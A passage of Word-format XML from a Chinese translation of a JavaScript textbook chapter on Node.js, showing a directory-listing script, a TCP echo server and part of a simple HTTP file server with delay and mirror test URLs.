      </w:r>
      <w:r>
        <w:t>或来自命令行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var files=fs.readdirSync(dir);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取目录内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.stdout.write("Name\tSize\tDate\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>输出头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>files.forEach(function(filename){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取每个文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fullname=path.join(dir,filename);//</w:t>
      </w:r>
      <w:r>
        <w:t>拼接目录和文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var stats=fs.statSync(fullname);</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取文件属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(stats.isDirectory())filename+="/";//</w:t>
      </w:r>
      <w:r>
        <w:t>标记子目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.stdout.write(filename+"\t"+//</w:t>
      </w:r>
      <w:r>
        <w:t>输出文件名</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stats.size+"\t"+//</w:t>
      </w:r>
      <w:r>
        <w:t>文件大小</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stats.mtime+"\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>修改时间</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注意上面第一行的注释</w:t>
      </w:r>
      <w:r>
        <w:t>“#!”</w:t>
      </w:r>
      <w:r>
        <w:t>。这是</w:t>
      </w:r>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>"shebang"</w:t>
      </w:r>
      <w:r>
        <w:t>注释，常用于使脚本文件被指定的某种语言解释器自动执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。当像这样的代码出现在文件的第一行时，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>会忽略它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"net"</w:t>
      </w:r>
      <w:r>
        <w:t>模块是用于基于</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>网络的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。（用于基于数据包网络的模块请看</w:t>
      </w:r>
      <w:r>
        <w:t>"dgram"</w:t>
      </w:r>
      <w:r>
        <w:t>。）下面是</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>中一个非常简单的</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Node</w:t>
      </w:r>
      <w:r>
        <w:t>中简单的</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>回显服务器：它监听</w:t>
      </w:r>
      <w:r>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:t>端口上的连接，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并把客户端的数据回显给它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var net=require('net');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var server=net.createServer();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>server.listen(2000,function(){console.log("Listening on port 2000");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>server.on(</w:t>
      </w:r>
      <w:r>
        <w:t>"connection",function(stream){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Accepting connection from",stream.remoteAddress);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stream.on("data",function(data){stream.write(data);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stream.on("end",function(data){console.log("Connection closed");});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除了基础的</w:t>
      </w:r>
      <w:r>
        <w:t>"net"</w:t>
      </w:r>
      <w:r>
        <w:t>模块，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"http"</w:t>
      </w:r>
      <w:r>
        <w:t>模块内置支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTT</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>协议。接下来的示例可以说明更多细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="12_2_1_NodeShi_Li__HTTPFu_Wu_Qi_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>12.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>示例：</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-2</w:t>
      </w:r>
      <w:r>
        <w:t>是一个基于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的简单</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务。它能处理当前目录的文件，并能实现两种特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。它使用了</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"http"</w:t>
      </w:r>
      <w:r>
        <w:t>模块，也会使用到前面提到的文件和流</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章的示例</w:t>
      </w:r>
      <w:r>
        <w:t>18-17</w:t>
      </w:r>
      <w:r>
        <w:t>是一个与之类似的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-2</w:t>
      </w:r>
      <w:r>
        <w:t>：基于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Node HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器，能处理当前目录的文件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并能实现两种特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>用于测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>http://localhost:8</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>http://127.0.0.1:8000</w:t>
      </w:r>
      <w:r>
        <w:t>连接这个服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，加载所有要用的模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var http=require('http');//HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fs=require('fs');//</w:t>
      </w:r>
      <w:r>
        <w:t>用于处理本地文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var server=new http.Server();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>server.listen(8000);//</w:t>
      </w:r>
      <w:r>
        <w:t>在端口</w:t>
      </w:r>
      <w:r>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:t>上运行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Node</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"on()"</w:t>
      </w:r>
      <w:r>
        <w:t>方法注册事件处理程序，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当服务器得到新请求，则运行函数处理它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>server.on("request",function(request,response){//</w:t>
      </w:r>
      <w:r>
        <w:t>解析请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=require('url').parse(request.url);//</w:t>
      </w:r>
      <w:r>
        <w:t>特殊</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>会让服务器在发送响应前先等待</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此处用于模拟缓慢的网络连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(url.pathname==="/test/delay"){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用查询字符串来获取延迟时长，或者</w:t>
      </w:r>
      <w:r>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var delay=parseInt(url.query)||2000;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置响应状态码和头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.wr</w:t>
      </w:r>
      <w:r>
        <w:t>iteHead(200,{"Content-Type":"text/plain;charset=UTF-8"});//</w:t>
      </w:r>
      <w:r>
        <w:t>立即开始编写响应主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write("Sleeping for"+delay+"milliseconds...");//</w:t>
      </w:r>
      <w:r>
        <w:t>在之后调用的另一个函数中完成响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write("done.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>},delay);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>若请求是</w:t>
      </w:r>
      <w:r>
        <w:t>"/test/mirror"</w:t>
      </w:r>
      <w:r>
        <w:t>，则原文返回它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当需要看到这</w:t>
      </w:r>
      <w:r>
        <w:t>个请求头和主体时，会很有用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(url.pathname==="/test/mirror"){//</w:t>
      </w:r>
      <w:r>
        <w:t>响应状态和头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200,{"Content-Type":"text/plain;charset=UTF-8"});//</w:t>
      </w:r>
      <w:r>
        <w:t>用请求的内容开始编写响应主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(request.method+""+request.url+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"HTTP/"+request.httpVersion+"\r\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的请求头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var h in </w:t>
      </w:r>
      <w:r>
        <w:t>request.headers){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(h+":"+request.headers[h]+"\r\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write("\r\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>使用额外的空白行来结束头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在这些事件处理程序函数中完成响应：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当请求主体的数据块完成时，把其写入响应中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("data",function(chunk){response.write(chunk);});//</w:t>
      </w:r>
      <w:r>
        <w:t>当请求结束时，响应也完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("end",function(chunk){response.end();});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，处理来自本地目录的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>获取本地文件名，基于其扩展名推测内容类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var filename=url.pathname.substring(1);//</w:t>
      </w:r>
      <w:r>
        <w:t>去掉前导</w:t>
      </w:r>
      <w:r>
        <w:t>"/"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(filename.substring(filename.lastIndexOf(".")+1)){//</w:t>
      </w:r>
      <w:r>
        <w:t>扩展名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"html":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"htm":type="text/htm</w:t>
      </w:r>
      <w:r>
        <w:t>l;charset=UTF-8";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"js":type="application/javascript;charset=UTF-8";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"css":type="text/css;charset=UTF-8";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"txt":type="text/plain;charset=UTF-8";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case"manifest":type="text/cache-manifest;charset=UTF-8";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default:type=</w:t>
      </w:r>
      <w:r>
        <w:t>"application/octet-stream";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>异步读取文件，并将内容作为单独的数据块传给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于确实很大的文件，使用流</w:t>
      </w:r>
      <w:r>
        <w:t>API fs.createReadStream()</w:t>
      </w:r>
      <w:r>
        <w:t>更好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fs.readFile(filename,function(err,content){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(err){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果由于某些原因无法读取该文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(404,{//</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>未找到状态码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Content-Type":"text/plain;charset=UTF-8"</w:t>
      </w:r>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(err.message);//</w:t>
      </w:r>
      <w:r>
        <w:t>简单的错误消息主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，若读取文件成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200,//</w:t>
      </w:r>
      <w:r>
        <w:t>设置状态码和</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{"Content-Type":type});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
